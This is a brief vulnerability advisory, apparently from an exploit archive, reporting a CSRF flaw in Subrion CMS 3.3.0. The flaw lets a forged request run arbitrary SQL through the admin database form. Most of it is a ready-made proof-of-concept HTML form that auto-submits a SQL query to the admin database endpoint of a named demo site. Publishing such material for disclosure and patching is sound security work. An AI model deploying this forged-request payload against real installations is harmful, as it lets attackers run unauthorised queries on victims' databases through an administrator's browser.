Subrion version 3.3.0 suffers from a cross site request forgery vulnerability that allows for arbitrary SQL injection.
13a087d5f2f67cb83cae17714e4c2ac16a5fac9e86d1e5c867d8eb4365e3950f
# Affected software: subrion
# Type of vulnerability: csrf to sql injection
# URL: http://demo.subrion.org
# Discovered by: Provensec
# Website: http://www.provensec.com
#version v3.3.0
# Proof of concept
no csrf protection on database form which made subrion to vulnerable
to database injection
vuln parameter query
poc:
<html>
<body>
<form action="http://demo.subrion.org/admin/database/" method="POST">
<input type="hidden" name="query"
value="SELECT * FROM `sbr301_albums` `id` "
/>
<input type="hidden" name="table" value="sbr301_albums" />
<input type="hidden" name="field" value="id" />
<input type="hidden" name="exec_query" value="Go" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>